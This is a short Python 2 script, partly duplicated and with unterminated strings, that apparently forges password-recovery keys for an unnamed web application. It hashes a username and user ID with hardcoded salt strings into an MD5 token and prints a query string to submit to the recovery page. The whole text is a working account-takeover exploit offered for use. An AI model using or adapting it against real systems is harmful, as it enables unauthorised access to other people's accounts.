m.update(userName + "RMPBP" + raw_input("UserID:") + "PWRCVR")
print "&submited=yes&loginName=" + userName + "&key=" + str(m.hexdigest())
print "Submit the above to the querystring for the password recovery page

import md5

m = md5.new()

userName = raw_input("Username:")

m.update(userName + "RMPBP" + raw_input("UserID:") + "PWRCVR")

print "&submited=yes&loginName=" + userName + "&key=" + str(m.hexdigest())

print "Submit the above to the querystring for the password recovery page